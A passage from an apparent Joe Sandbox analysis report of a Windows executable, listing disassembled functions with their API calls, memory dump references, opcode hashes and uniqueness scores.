                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 2db08f6ae0459db61ae090422efe500d7e7866364bd10d209f24210f906d9d98
                                                    • Instruction ID: db476b5032985bc1f8d336f5677a79cbc99097fa68585317d9818cafb1bc3770
                                                    • Opcode Fuzzy Hash: 2db08f6ae0459db61ae090422efe500d7e7866364bd10d209f24210f906d9d98
                                                    • Instruction Fuzzy Hash: E3916071A01304AFDB6AEF64D880AEEB7F5FF48310F0545A9F445AB291D770A949CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00483B50 Relevance: 6.2, APIs: 4, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetShortPathNameW.KERNEL32 ref: 00483BB0
                                                    • GetShortPathNameW.KERNEL32 ref: 00483C1E
                                                    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00483C6E
                                                    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00483CA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiNamePathShortWide
                                                    • String ID:
                                                    • API String ID: 3379522384-0
                                                    • Opcode ID: bd5aabc3ccfdd004a04b82ac0d7ccbd2863fe1b4ebd8660554f1ea206029f883
                                                    • Instruction ID: 7f86e5c5c0e649aaa05ee51c9de9b68b3f963e96a55c462dccc0f4a11f292656
                                                    • Opcode Fuzzy Hash: bd5aabc3ccfdd004a04b82ac0d7ccbd2863fe1b4ebd8660554f1ea206029f883
                                                    • Instruction Fuzzy Hash: B651BC71600605AFD714EF68DC49F2EFBF5FF80B21F108A6DE911AB290DB35A9008B54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049D610 Relevance: 6.2, APIs: 4, Instructions: 157registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegCloseKey.ADVAPI32(00000000,D13B3340), ref: 0049D686
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0049D6B0
                                                    • RegQueryValueExW.ADVAPI32(00000000,D13B3340,00000000,00000000,00000000,00000000,D13B3340,00000001,?,00000000,00000000), ref: 0049D733
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0049D77F
                                                      • Part of subcall function 0049D530: RegOpenKeyExW.ADVAPI32(00000000,D13B3340,00000000,00020019,00000002,D13B3340,00000001,00000010,00000002,0049C85C,D13B3340,00000000,00000000), ref: 0049D5CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue_wcsrchr
                                                    • String ID:
                                                    • API String ID: 213811329-0
                                                    • Opcode ID: 3455896e0d359e34675ac1ef1d8ecf7f9a2c2d154765430ee20f41d5e22adcbd
                                                    • Instruction ID: 6f94a57731fab9be3cb8f51d6b6e0d884d6fcba1f1935b5d166bc2b19dc7748c
                                                    • Opcode Fuzzy Hash: 3455896e0d359e34675ac1ef1d8ecf7f9a2c2d154765430ee20f41d5e22adcbd
                                                    • Instruction Fuzzy Hash: 7C51DF72D01349AFDB10CFA8D944B9EBFB5EF41324F14826AE825973C1D7799A00CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00484C80 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,?,?), ref: 00484D6A
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,?,?), ref: 00484D8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: <3[$<3[
                                                    • API String ID: 2962429428-896619088
                                                    • Opcode ID: 58b96b5a4a522fadd71d8bc1c7b1be355862597188be26c0b7072444280ce700
                                                    • Instruction ID: 6e7ee9e74be358a6c585d5b8084db56b3fd4bc52794e701d66e2bac6921ac05b
                                                    • Opcode Fuzzy Hash: 58b96b5a4a522fadd71d8bc1c7b1be355862597188be26c0b7072444280ce700
                                                    • Instruction Fuzzy Hash: 69512630901A85CFE711CF68C948B4AFBF5FF89314F1486A9D445DB3A1EB74AA05CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00400280 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindResourceW.KERNEL32(00000000,?,00000017,D13B3340,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310), ref: 004002C9
                                                    • LoadResource.KERNEL32(00000000,00000000,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310,?), ref: 004002D8
                                                    • LockResource.KERNEL32(00000000,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310,?), ref: 004002E3
                                                    • SizeofResource.KERNEL32(00000000,?,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310,?), ref: 004002F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: af2f7fd31542adf59d3b901bfb1f8ab6ea5f6a0aaebe681cf3bff3f5c14bb4f1
                                                    • Instruction ID: 9a4cb911ccfa619eb596c219303a9093eb645be84627f4e64bf1dfbd35c6c61e
                                                    • Opcode Fuzzy Hash: af2f7fd31542adf59d3b901bfb1f8ab6ea5f6a0aaebe681cf3bff3f5c14bb4f1
                                                    • Instruction Fuzzy Hash: F431C071E056059BD7219F34DD05BBBBBB8FB44710F10823AEC15A72C0EF34AA0897A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036F120 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000FC,00000000), ref: 0036F169
                                                    • GetParent.USER32(?), ref: 0036F19D
                                                      • Part of subcall function 0051FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00495F3E,?,?,?,?,?,?), ref: 0051FA18
                                                      • Part of subcall function 0051FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA1F
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0036F1D0
                                                    • ShowWindow.USER32(?,00000000), ref: 0036F1E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$HeapLong$AllocParentProcessShow
                                                    • String ID:
                                                    • API String ID: 78937335-0
                                                    • Opcode ID: 4719ea1cf0b64adbdd89d5b71d078336392a3280a63fb65c6b9223cd72613d99
                                                    • Instruction ID: 8aa46c53b570c9335138feb828310a5f630af4b2d859e93a934f8f3dc678f3db
                                                    • Opcode Fuzzy Hash: 4719ea1cf0b64adbdd89d5b71d078336392a3280a63fb65c6b9223cd72613d99
                                                    • Instruction Fuzzy Hash: F32182706047029FD721DF29E80896BBBE9FF85754B414A2DF456C2662DB30F844CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A5990 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ResetEvent.KERNEL32(?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A59A2
                                                    • GetLastError.KERNEL32(?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A59CF
                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A5A05
                                                    • SetEvent.KERNEL32(?,?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A5A28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Event$ErrorLastObjectResetSingleWait
                                                    • String ID:
                                                    • API String ID: 708712559-0
                                                    • Opcode ID: b3558ccd96e3258de81afc88d922231016bd7a00bd2f69be2f5444d61d6baa05
                                                    • Instruction ID: f2841c307b7727de2148a8d8aa7511072965f8522a0379794db1144e8f8a067e
                                                    • Opcode Fuzzy Hash: b3558ccd96e3258de81afc88d922231016bd7a00bd2f69be2f5444d61d6baa05
                                                    • Instruction Fuzzy Hash: 4A115131714B408FE7719B25EA88B6B7B95BF72324F04591EE08386771C768EC85D750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B1A20 Relevance: 6.0, APIs: 4, Instructions: 44threadsynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(00000000,?,D13B3340,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?), ref: 004B1A57
                                                    • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?,80004005), ref: 004B1A71
                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?,80004005), ref: 004B1A89
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?,80004005,D13B3340), ref: 004B1A92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
                                                    • String ID:
                                                    • API String ID: 3774109050-0
                                                    • Opcode ID: 0faac58dcdaca3be46087adee259cfe11305163a07c5e1a924780a1d70109a7e
                                                    • Instruction ID: 6b92f5ed398e5b18bef2ada9d7d3e1963aaf9c064e9c29b3c4d800f760cf5465
                                                    • Opcode Fuzzy Hash: 0faac58dcdaca3be46087adee259cfe11305163a07c5e1a924780a1d70109a7e
                                                    • Instruction Fuzzy Hash: 38019E31900706EFCB208F54DC08BBBBBF8FB09714F00462AE826926A0DB74AC04CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045EAB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PathIsUNCW.SHLWAPI(?,D13B3340), ref: 0045EB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Path
                                                    • String ID: \\?\$\\?\UNC\
                                                    • API String ID: 2875597873-3019864461
                                                    • Opcode ID: 7e80ca4f7048ba2d5b5078be45939f1da07ca7d6b952b001fe84096bd11754e9
                                                    • Instruction ID: cbc72a4a681af93f4a13f22b08d9302c5874a36143002c17ccfc921ab417ab80
                                                    • Opcode Fuzzy Hash: 7e80ca4f7048ba2d5b5078be45939f1da07ca7d6b952b001fe84096bd11754e9
                                                    • Instruction Fuzzy Hash: 3B51F370D006049BDB18CF69D985BAEF7F5FF85305F10861EE80267282EB756A48CBE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004C25A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenEventW.KERNEL32(00000000,00000000,D13B3340,_pbl_evt,00000008,?,?,005CB480,00000001,D13B3340,00000000), ref: 004C264E
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 004C266B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Event$CreateOpen
                                                    • String ID: _pbl_evt
                                                    • API String ID: 2335040897-4023232351
                                                    • Opcode ID: c6b2f3b2cb7cbb4eb1cfb16a04e2ea67527262628c1a5c03955f743eed8ba27b
                                                    • Instruction ID: 478ccf32b0df5e62135902498820cdfe1d6ab1f003fc300284000a8482277483
                                                    • Opcode Fuzzy Hash: c6b2f3b2cb7cbb4eb1cfb16a04e2ea67527262628c1a5c03955f743eed8ba27b
                                                    • Instruction Fuzzy Hash: 4A517F71D10608EFDB10DF68CD46BAEB7B8FB15710F10826AE911B72D0DBB46A04CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A0870 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?,D13B3340,?,?,006394D0), ref: 004A08AF
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,006394D0), ref: 004A0910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryPathTemp
                                                    • String ID: ADVINST_LOGS
                                                    • API String ID: 2885754953-2492584244
                                                    • Opcode ID: 38e0da864187b552482e4515115df60c59fd1c89980fc916bb39f9b271a3394c
                                                    • Instruction ID: 94346d478a78fd6998a7a6ca8fc65a1a442f8e5514c8b6ce30d72c510614a1a7
                                                    • Opcode Fuzzy Hash: 38e0da864187b552482e4515115df60c59fd1c89980fc916bb39f9b271a3394c
                                                    • Instruction Fuzzy Hash: 5F51B1B5940219CADB309F28C8447BBB3F8FF26714F1446AFD84997291EB385D85CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0054167C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0053820D: RtlFreeHeap.NTDLL(00000000,00000000,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538223
                                                      • Part of subcall function 0053820D: GetLastError.KERNEL32(?,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 0053822E
                                                    • ___free_lconv_mon.LIBCMT ref: 005416C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID: XBc$p@c
                                                    • API String ID: 4068849827-1312289162
                                                    • Opcode ID: c030ce43f277580a0ac82325dd2775de73cfd1e897d8aab6ac347db4e9913d11
                                                    • Instruction ID: 38913ea962d5f35231c7a9dc864b717022b31a18f143001ab65a1c08c2e3a671
                                                    • Opcode Fuzzy Hash: c030ce43f277580a0ac82325dd2775de73cfd1e897d8aab6ac347db4e9913d11
                                                    • Instruction Fuzzy Hash: 0B314A71600B019FEB25AA78DC49FAA7FE9FF40354F254529F065D7191DF31E8808B58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00475040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,D13B3340,005CA7FC), ref: 004750AC
                                                    • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 004751A3
                                                      • Part of subcall function 004649B0: std::locale::_Init.LIBCPMT ref: 00464A8D
                                                      • Part of subcall function 00462440: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00462515
                                                    Strings
                                                    • Failed to get Windows error message [win32 error 0x, xrefs: 004750CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FormatFreeInitIos_base_dtorLocalMessagestd::ios_base::_std::locale::_
                                                    • String ID: Failed to get Windows error message [win32 error 0x
                                                    • API String ID: 1983821583-3373098694
                                                    • Opcode ID: 97d337acd6bf913d375403c357f28ebea9ff60ac234480a0ef9ea8de5bface55
                                                    • Instruction ID: f8cacb592408c299a4bb0cca95c8000c1866764582413eb032b9bf9ec64f2f93
                                                    • Opcode Fuzzy Hash: 97d337acd6bf913d375403c357f28ebea9ff60ac234480a0ef9ea8de5bface55
                                                    • Instruction Fuzzy Hash: 9041B370E007089BDB10DF58CD46BAFBBF8FF40314F248159E504AB291EBB49A48CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039E590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedPushEntrySList.KERNEL32(00638A70,00638B18,Windows.UI.Xaml.Controls.TextBlock,00000022,D13B3340,00639310,000000C4,?,00638B14,Function_001F8977,000000FF), ref: 0039E668
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EntryInterlockedListPush
                                                    • String ID: P9$Windows.UI.Xaml.Controls.TextBlock
                                                    • API String ID: 4129690577-962723295
                                                    • Opcode ID: 74bf334a2089f1307f36ec94f0c33ad609f9ec8e11a4ef852140c1a7df5bbe26
                                                    • Instruction ID: 0ce58be1ea2065a5a0941b8fe20c8c1083406433f8480ab7c51e58cc967131a5
                                                    • Opcode Fuzzy Hash: 74bf334a2089f1307f36ec94f0c33ad609f9ec8e11a4ef852140c1a7df5bbe26
                                                    • Instruction Fuzzy Hash: B9316BB1A0121ADFDB01DF94C845BEEFBB4FF14715F104129E8116B290DBB56A08CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003638A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000002), ref: 0036392B
                                                    • IsWindow.USER32(00000002), ref: 00363942
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
